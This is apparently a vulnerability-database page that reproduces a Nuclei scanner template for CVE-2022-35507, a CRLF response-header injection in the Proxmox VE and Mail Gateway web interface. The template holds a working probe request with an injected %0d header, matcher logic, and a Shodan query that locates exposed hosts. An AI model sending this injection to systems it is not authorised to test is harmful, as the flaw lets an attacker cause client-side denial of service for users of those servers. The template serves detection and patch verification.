A response-header CRLF injection vulnerability in the Proxmox Virtual Environment (PVE) and Proxmox Mail Gateway (PMG) web interface allows a remote attacker to set cookies for a victim's browser that are longer than the server expects, causing a client-side DoS. This affects Chromium-based browsers because they allow injection of response headers with %0d. This is fixed in pve-http-server 4.1-3.
PoC代码[已公开]
id: CVE-2022-35507
info:
name: Proxmox - CRLF Injection
author: DhiyaneshDk
severity: high
description: |
A response-header CRLF injection vulnerability in the Proxmox Virtual Environment (PVE) and Proxmox Mail Gateway (PMG) web interface allows a remote attacker to set cookies for a victim's browser that are longer than the server expects, causing a client-side DoS. This affects Chromium-based browsers because they allow injection of response headers with %0d. This is fixed in pve-http-server 4.1-3.
reference:
- https://git.proxmox.com/?p=pve-http-server.git%3Ba=commitdiff%3Bh=936007ae0241811093155000486da171379c23c2
- https://github.com/advisories/GHSA-xfgp-gpjw-wmqr
- https://starlabs.sg/blog/2022/12-multiple-vulnerabilites-in-proxmox-ve--proxmox-mail-gateway/#bug-0x02-crlf-injection-in-response-headers
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H
cvss-score: 7.1
cve-id: CVE-2022-35507
cwe-id: CWE-74
epss-score: 0.33262
epss-percentile: 0.96785
cpe: cpe:2.3:a:proxmox:proxmox_mail_gateway:-:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: proxmox
product: proxmox_mail_gateway
shodan-query: html:"Proxmox = {"
tags: cve,cve2022,proxmox,crlf
http:
- raw:
- |
GET /404%0dnew-header:value%0da: HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "contains(all_headers, 'new-header:value')"
- "status_code == 501"
condition: and
# digest: 490a00463044022067d4f5b033f553b6ae4afa8cd02986ee5b4221616b11fa55a0d7a68f3aa4416702200baab46f63d1c8bc86d5ae52088cb12ac76106f23a4e2eefba20a08567b3331d:922c64590222798bb761d5b6d8e72950